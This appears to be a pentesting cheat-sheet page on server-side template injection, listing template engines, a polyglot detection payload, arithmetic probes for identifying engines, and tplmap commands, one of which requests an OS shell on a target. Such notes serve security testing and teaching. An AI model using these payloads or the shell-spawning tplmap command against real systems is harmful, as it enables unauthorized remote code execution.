# SSTI ### What is SSTI? #### Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side. This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE). Some of the most popular template engines can be listed as the followings: * PHP – Smarty, Twigs * Java – Velocity, Freemaker * Python – JINJA, Mako, Tornado * JavaScript – Jade, Rage * Ruby – Liquid ### How Does It Work? For the sake of simplicity, imagine you're testing the parameter of the following request: ```html POST /some-endpoint HTTP/1.1 Host: vulnerable-website.com parameter=value ``` To detect the vulnerability, use the polyglot payload as the value of the parameter which is a sequence of special characters such as the following: ``` POST /some-endpoint HTTP/1.1 Host: vulnerable-website.com parameter=${{<%[%'"}}%\. ``` To identify the template engine, read the error message: ![](https://794785868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F5HSSdz0o2gP99PtxMWiZ%2Fuploads%2FQDslfu4JjuOpGutZB4KK%2F1.webp?alt=media\&token=4f23a261-f346-4c92-8ab9-4cf095ceedd6) If the error message is not displaying the template engine, we can test via known syntaxes for the popular template engines: ``` {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}} #{7*7} ``` ## Exploit ### Tools ### [Tplmap](https://github.com/epinna/tplmap) ```python python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade ``` Links : {% embed url="" %} {% embed url="" %} {% embed url="" %}